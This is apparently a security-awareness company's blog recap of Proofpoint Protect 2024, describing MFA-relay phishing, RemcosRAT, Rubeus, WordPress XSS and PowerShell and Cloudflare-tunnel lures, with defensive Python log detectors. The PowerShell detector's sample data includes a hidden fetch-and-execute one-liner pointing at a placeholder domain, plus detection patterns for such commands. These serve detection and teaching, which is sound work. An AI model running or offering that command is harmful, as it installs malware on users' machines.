How cybercriminals bypass your technical defences with Evil Twin Tools and some other insights from Proofpoint Protect 2024 (London)
Last week, Proofpoint was in London as part of its Proofpoint Protect roadshow. Proofpoint is perhaps best known for its secure email gateways, which organisations worldwide use. It was a pleasure meeting their super-nice team and listening to some fascinating insights. One theme that came up repeatedly was how cybercriminals bypass many technical defences with so-called “Evil Twin” tools.
Defeating technical defences with Evil Twin tools
“Evil Twin” tools are now in widespread use by cybercriminals. Each year organisations spend substantial amounts on technical defences such as email gateways, next-generation firewalls and WAFs. However, in tandem with the sophistication and scope of this defence ecosystem, cybercriminals have developed their own “evil twin” ecosystem to circumvent these defences. Here are some real-life examples:
Defeating Multi-Factor Authentication
According to the latest Proofpoint data, 52% of hijacked accounts had MFA enabled. This is a shockingly high figure. Multi-factor authentication can be bypassed using tools like Evilginx. This MFA “defeat kit in a box” lets cybercriminals easily set up bogus credential-entry landing pages that relay the victim's login to the real service and capture the session token issued once MFA has succeeded. This means that email accounts (such as Microsoft 365) protected by MFA can still be compromised.
Implication for Security Awareness: Security awareness people need to stop trotting out lines like “MFA prevents 99% of phishing attacks.” This lulls users into a false sense of security. Of course, users need to be told to enable MFA on their accounts, but they should also be told that MFA is not infallible and that good cyber hygiene needs to be practised.
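The tell-tale sign of the session hijacking described above is a session token that was issued after a successful MFA sign-in from one address and is then presented from a different address (often with a different client) minutes later. The following is an added example, not code from Proofpoint or from the Evilginx project: it scans constructed identity-provider log lines (the `user=`/`session=`/`ip=` format is an assumption; real products expose the same fields under their own names) and flags sessions reused from a second IP within a short window of the interactive sign-in.

```python
"""Detecting a hijacked session: the same session identifier used from a second
client IP shortly after an MFA-passed sign-in. Added example with constructed
log lines; the field names are assumptions, not any vendor's schema."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sign-in / token-use records (documentation-range IPs).
# alice's session is presented from a second address, by a non-browser client,
# three minutes after her interactive sign-in; bob's session is never reused.
SAMPLE_LOG = """\
2024-09-10T08:02:11Z user=alice@example.test session=sess-7f3a ip=203.0.113.10 ua=Chrome/128 event=interactive_signin mfa=success
2024-09-10T08:02:40Z user=alice@example.test session=sess-7f3a ip=203.0.113.10 ua=Chrome/128 event=token_use
2024-09-10T08:05:03Z user=alice@example.test session=sess-7f3a ip=198.51.100.77 ua=python-requests/2.31 event=token_use
2024-09-10T09:15:22Z user=bob@example.test session=sess-c1d2 ip=192.0.2.44 ua=Edge/128 event=interactive_signin mfa=success
2024-09-10T09:30:00Z user=bob@example.test session=sess-c1d2 ip=192.0.2.44 ua=Edge/128 event=token_use
"""


def parse_line(line):
    """Parse one 'timestamp key=value ...' record into a dict."""
    parts = line.split()
    rec = {"ts": datetime.strptime(parts[0], "%Y-%m-%dT%H:%M:%SZ")}
    for kv in parts[1:]:
        key, _, value = kv.partition("=")
        rec[key] = value
    return rec


def find_session_reuse(log_text, window=timedelta(minutes=30)):
    """Return one alert per session whose token is presented from an IP other
    than the one that completed the interactive sign-in, within `window`."""
    by_session = defaultdict(list)
    for line in log_text.splitlines():
        if line.strip():
            rec = parse_line(line)
            by_session[rec["session"]].append(rec)

    alerts = []
    for session_id, recs in by_session.items():
        recs.sort(key=lambda r: r["ts"])
        signin = next((r for r in recs if r.get("event") == "interactive_signin"), None)
        if signin is None:
            continue  # no sign-in seen for this session; nothing to compare against
        for rec in recs:
            if rec["ip"] != signin["ip"] and rec["ts"] - signin["ts"] <= window:
                alerts.append({
                    "user": signin["user"],
                    "session": session_id,
                    "signin_ip": signin["ip"],
                    "reuse_ip": rec["ip"],
                    "reuse_ua": rec.get("ua"),
                    "minutes_after": (rec["ts"] - signin["ts"]).total_seconds() / 60,
                })
    return alerts


if __name__ == "__main__":
    for alert in find_session_reuse(SAMPLE_LOG):
        print(alert)
```

A single alert like this is worth a revoke-sessions-and-reset action rather than a ticket: the token was accepted, so the account is already in use by whoever holds it.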
Defeating Next-Generation Firewalls
While terms like “next-generation firewall” might sound reassuringly sophisticated, these, too, can be defeated. For example, a cybercriminal can download and package a tool like RemcosRAT and send it via phishing (what else…!) to their target. And RemcosRAT is a sneaky little bugger. It can easily be “crypted” and packed to make its payload hard to detect. Moreover, it hitches a ride on the native Windows “explorer.exe” process to evade detection. Not only that, but RemcosRAT also uses PowerShell to escalate privileges. So even if your Windows systems are locked down in standard-user mode, this malicious remote-access tool escalates itself to run in admin mode. Once in situ, it communicates with its C2 server using harder-to-detect domains thanks to domain generation algorithms (DGA). What can RemcosRAT do once installed? Well, it gives cybercriminals almost complete control over your PC, enabling them to access files, record keystrokes, record screens, turn on your webcam, and steal login credentials. All because you opened that attachment or weblink…
Implication for Security Awareness: RemcosRAT is a favourite tool in technical support scams. “A problem has been detected with your system or account. You need to download this tool.” A message like this becomes very believable when a hijacked or spoofed email belonging to an MSP, IT contractor, or in-house IT team is used. And talking about account takeover, the latest Proofpoint data shows that 56% of organisations have experienced an account-takeover event in the last year.
If a cybercriminal gets into your Windows environment, weak internal passwords make very easy work for tools like Rubeus
Many organisations have bought Privileged Access Management tools to protect privileged accounts. These accounts are critical because they have the power to change privileges on machines across the whole network. If, for example, a cybercriminal were preparing the ground to execute a crypto-ransomware attack, escalating privileges would be an important step. Moreover, by protecting privileged accounts, you mitigate the risk of a hacker moving laterally across your network. However, yet again, cybercriminals have devised their “evil twin” tools to defeat these defences. One such tool is Rubeus. This Kerberos ticket-grabbing tool with a pass-the-ticket function can survey your Active Directory landscape and brute-force accounts with weak passwords.
Implications for Security Awareness: Users must remember that robust passwords are not just required for external cloud-based services. Robust passwords need to be set to prevent account takeover and lateral movement should a hacker get inside their organisation’s network. Users must be informed that cybercriminals will use tools like Rubeus to brute-force weak passwords and that setting robust passwords lowers their risk.
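Password guessing against Active Directory leaves a trail on the domain controllers: each wrong password for an existing account is recorded as Windows Event ID 4771 (Kerberos pre-authentication failed) with failure code 0x18, and the client address of the machine doing the guessing. The following is an added example, not Proofpoint's or the Rubeus project's code; the event lines are constructed to mirror the 4771 fields, and the host names and IPs are placeholders. It flags a source that fails pre-authentication for many distinct accounts inside a short window, which is the shape of a spray against weak passwords, while leaving a user mistyping their own password alone.

```python
"""Spotting password spraying from domain-controller security events.
Added example with constructed Event ID 4771 records; IPs and user names are
placeholders."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed 4771 events. FailureCode 0x18 = pre-authentication information
# invalid (wrong password for an existing account); 0x12 = credentials
# revoked (account disabled or locked out), which is excluded below.
SAMPLE_EVENTS = [
    "2024-09-10T10:00:01Z EventID=4771 TargetUserName=jsmith FailureCode=0x18 IpAddress=10.0.0.55",
    "2024-09-10T10:00:02Z EventID=4771 TargetUserName=mjones FailureCode=0x18 IpAddress=10.0.0.55",
    "2024-09-10T10:00:03Z EventID=4771 TargetUserName=akhan FailureCode=0x18 IpAddress=10.0.0.55",
    "2024-09-10T10:00:04Z EventID=4771 TargetUserName=svc_backup FailureCode=0x18 IpAddress=10.0.0.55",
    "2024-09-10T10:00:05Z EventID=4771 TargetUserName=rlee FailureCode=0x18 IpAddress=10.0.0.55",
    "2024-09-10T10:00:06Z EventID=4771 TargetUserName=pwang FailureCode=0x18 IpAddress=10.0.0.55",
    # one user mistyping twice from their own workstation: not a spray
    "2024-09-10T10:07:30Z EventID=4771 TargetUserName=jsmith FailureCode=0x18 IpAddress=10.0.0.12",
    "2024-09-10T10:07:45Z EventID=4771 TargetUserName=jsmith FailureCode=0x18 IpAddress=10.0.0.12",
    "2024-09-10T10:20:00Z EventID=4771 TargetUserName=mjones FailureCode=0x12 IpAddress=10.0.0.12",
]


def parse_event(line):
    """Parse one 'timestamp Key=Value ...' record into a dict."""
    parts = line.split()
    event = {"ts": datetime.strptime(parts[0], "%Y-%m-%dT%H:%M:%SZ")}
    for kv in parts[1:]:
        key, _, value = kv.partition("=")
        event[key] = value
    return event


def detect_spraying(events, window=timedelta(minutes=5), min_accounts=5):
    """Flag each source address that produces wrong-password failures for at
    least `min_accounts` distinct accounts within any `window`-long span."""
    by_source = defaultdict(list)
    for line in events:
        event = parse_event(line)
        if event.get("EventID") == "4771" and event.get("FailureCode") == "0x18":
            by_source[event["IpAddress"]].append(event)

    alerts = []
    for source_ip, evs in by_source.items():
        evs.sort(key=lambda e: e["ts"])
        # Slide a time window over this source's failures and keep the
        # largest set of distinct accounts seen inside any one window.
        start, best = 0, set()
        for end in range(len(evs)):
            while evs[end]["ts"] - evs[start]["ts"] > window:
                start += 1
            accounts = {e["TargetUserName"] for e in evs[start:end + 1]}
            if len(accounts) > len(best):
                best = accounts
        if len(best) >= min_accounts:
            alerts.append({
                "source": source_ip,
                "accounts": sorted(best),
                "first_seen": evs[0]["ts"],
            })
    return alerts


if __name__ == "__main__":
    for alert in detect_spraying(SAMPLE_EVENTS):
        print(alert)
```

Tune `window` and `min_accounts` to your environment's normal failure rate; a help-desk machine that resets many passwords is the usual false positive, and is easy to allow-list by source address.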
The weaponisation of WordPress
WordPress-powered sites account for almost 40% of the web. Unfortunately, some WordPress sites have plug-ins and “themes” that are months, if not years, out of date. Many of these sites still use default login credentials such as “admin”. These vulnerabilities are catnip for cybercriminals. One speaker at Proofpoint Protect explained how a cross-site scripting (XSS) attack can inject malicious script into a WordPress site. When a user visits the infected website, they will see a rather urgent message on their screen that their browser needs updating – which, of course, if clicked, culminates in a malware infection.
Implication for Security Awareness: A user might visit an otherwise trustworthy website with a WordPress blog section infected with XSS malware. When they see a notification pop-up about an out-of-date browser, they might erroneously infer that the message is genuine. Users who trust a website are likelier to follow its instructions. This could result in their browser getting compromised and their credentials for Microsoft 365 or some other cloud service being compromised.
The weaponisation of PowerShell
PowerShell is a powerful task automation and configuration management tool built into the Windows operating system. The researchers at Proofpoint have discovered at least one cybercriminal group (TA571) actively distributing PowerShell commands to deliver DarkGate and Matanbuchus malware. This attack normally starts with a user engaging with a malspam message or visiting an infected website, where a malicious script is injected into the page they are viewing. Shortly thereafter, the user is presented with a pop-up text box containing commands. The user is told to open PowerShell using the Windows key + X keyboard shortcut and to input the commands.
Implication for Security Awareness: This PowerShell-themed phishing message is a very interesting one because of its potential power to misdirect. The message sounds technical and is even framed as a guide to fixing a problem with the user's system. These are two attributes that users don’t normally associate with phishing attacks. Users need to be shown some real-life samples of these PowerShell-themed attacks to increase their “immunity” to them.
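Awareness training is the first line against the paste-into-PowerShell lure described above; the second is PowerShell script block logging (Event ID 4104), which records what was actually run. The following is an added example, not Proofpoint's code: it scores constructed script-block entries for the traits a pasted one-liner tends to combine (hidden window, execution-policy bypass, fetch-and-evaluate, encoded command). The sample entries and the domain names in them are constructed placeholders, and the weights are assumptions to be tuned; no single indicator is malicious on its own, which is why the example scores combinations rather than matching one keyword.

```python
"""Scoring PowerShell script-block log entries (Event ID 4104) for the traits
of 'paste this into PowerShell' lures. Added example with constructed entries;
the indicator weights are assumptions."""
import re

# Each indicator is (regex, weight, label). All are legitimate in admin
# scripts; several together in an interactive session are what stand out.
INDICATORS = [
    (r"(?i)(^|\s)-(w|win|windowstyle)\s+hidden", 2, "hidden window"),
    (r"(?i)(^|\s)-(ep|ex|exec|executionpolicy)\s+bypass", 2, "execution policy bypass"),
    (r"(?i)\b(iex|invoke-expression)\b", 3, "invoke-expression"),
    (r"(?i)\b(irm|invoke-restmethod|iwr|invoke-webrequest|downloadstring)\b", 2, "remote download"),
    (r"(?i)(^|\s)-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", 3, "encoded command"),
]

# Constructed script-block texts, as they would appear in the 4104 message.
SAMPLE_BLOCKS = [
    # the kind of line a fake "fix your browser" pop-up asks the user to paste
    'powershell -w hidden -ep bypass -c "iex (irm https://browser-fix.invalid/update.txt)"',
    # routine administration
    "Get-ChildItem C:\\Logs -Filter *.evtx | Where-Object { $_.Length -gt 10MB }",
    # legitimate download-based install: one indicator, below the threshold
    "Invoke-WebRequest -Uri https://intranet.example.test/agent.msi -OutFile C:\\Temp\\agent.msi",
]


def score_script_block(text):
    """Return (score, [labels]) for one script-block text."""
    score, hits = 0, []
    for pattern, weight, label in INDICATORS:
        if re.search(pattern, text):
            score += weight
            hits.append(label)
    return score, hits


def triage(blocks, threshold=5):
    """Return (text, score, labels) for every block at or above `threshold`,
    highest score first."""
    flagged = []
    for text in blocks:
        score, hits = score_script_block(text)
        if score >= threshold:
            flagged.append((text, score, hits))
    return sorted(flagged, key=lambda item: item[1], reverse=True)


if __name__ == "__main__":
    for text, score, hits in triage(SAMPLE_BLOCKS):
        print(score, hits, text)
```

In practice the 4104 event also carries the user and host, so a hit on a workstation belonging to someone in finance, with no admin role, is far more telling than the same text on a systems administrator's machine; feed those fields into the score rather than relying on the text alone.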
Malicious Cloudflare tunnels can be used to bypass your technical defences and exfiltrate your data
For some network and systems administrators, Cloudflare is generally perceived as a secure service. And for the most part, it is. However, according to Proofpoint researchers, services such as TryCloudflare are increasingly being used as malware delivery mechanisms. This is worrying because firewalls and secure email gateways can’t see what is transiting through a Cloudflare tunnel. And Cloudflare, because it’s generally perceived as a “safe” application, is less likely to be flagged as suspicious by your perimeter firewall. This means that the end user plays a pivotal role in not letting any malicious Cloudflare tunnels into their organisation in the first place.
Implication for Security Awareness: Many attacks involving malicious Cloudflare tunnels start with a finance-themed phishing email where the user is persuaded to click on a VBS or LNK file. Many users don’t understand that cybercriminals can tunnel into their organisation’s network, evading defences such as endpoint detection or network firewalls. And users don’t often know that the first step in this “tunnelling process” is opening an attachment or weblink.
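The perimeter cannot inspect what crosses a Cloudflare tunnel, but it can still see the name lookups that precede it: TryCloudflare quick tunnels are published as subdomains of trycloudflare.com, and a workstation resolving such a name is a useful lead whether the user clicked a link to it or something on the machine is calling home. The following is an added example, not Proofpoint's or Cloudflare's code: it scans constructed DNS log lines (the `client=`/`query=` format, the internal IPs and the tunnel hostnames are all placeholders) and maps each client to the tunnel hostnames it resolved, using a label-boundary match so that look-alike names containing the string are not mistaken for the real suffix.

```python
"""Finding internal hosts that resolve quick-tunnel hostnames in DNS logs.
Added example with constructed log lines; clients and hostnames are
placeholders."""
from collections import defaultdict

# Quick tunnels created with TryCloudflare are published under this suffix.
TUNNEL_SUFFIXES = ("trycloudflare.com",)

# Constructed resolver log. 10.20.0.15 resolves two tunnel hostnames a few
# minutes apart; 10.20.0.31 only looks up Cloudflare's own site and a
# look-alike name that merely contains the suffix as a prefix.
SAMPLE_DNS = """\
2024-09-10T11:02:01Z client=10.20.0.15 query=login.microsoftonline.com type=A
2024-09-10T11:02:09Z client=10.20.0.15 query=quiet-river-invoice-docs.trycloudflare.com type=A
2024-09-10T11:02:10Z client=10.20.0.15 query=quiet-river-invoice-docs.trycloudflare.com type=AAAA
2024-09-10T11:03:44Z client=10.20.0.31 query=www.cloudflare.com type=A
2024-09-10T11:04:12Z client=10.20.0.31 query=trycloudflare.com.cdn.example.test type=A
2024-09-10T11:09:30Z client=10.20.0.15 query=shy-hall-portal.trycloudflare.com. type=A
"""


def is_tunnel_host(name):
    """True when `name` is a tunnel suffix itself or a subdomain of one.
    Matching on a label boundary ('.' + suffix) avoids false hits on names
    such as 'trycloudflare.com.cdn.example.test'."""
    name = name.rstrip(".").lower()
    return any(name == s or name.endswith("." + s) for s in TUNNEL_SUFFIXES)


def parse_dns(line):
    """Parse one 'timestamp key=value ...' resolver record into a dict."""
    parts = line.split()
    rec = {"ts": parts[0]}
    for kv in parts[1:]:
        key, _, value = kv.partition("=")
        rec[key] = value
    return rec


def tunnel_lookups(log_text):
    """Map each internal client to the sorted, distinct tunnel hostnames it
    resolved (A and AAAA lookups for the same name count once)."""
    seen = defaultdict(set)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = parse_dns(line)
        if is_tunnel_host(rec["query"]):
            seen[rec["client"]].add(rec["query"].rstrip(".").lower())
    return {client: sorted(hosts) for client, hosts in seen.items()}


if __name__ == "__main__":
    for client, hosts in tunnel_lookups(SAMPLE_DNS).items():
        print(client, hosts)
```

A lookup is a lead, not a verdict: pivot from the client address to the endpoint's process and file events around that timestamp to see whether a freshly opened LNK or VBS, or a browser, made the request.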
More than ever, users play a critical role in protecting your organisation's information assets and infrastructure. SecureClick provides interactive and customised security awareness training. Our service is offered virtually (over Zoom / MS Teams), on-site or over our elearning and microlearning platforms.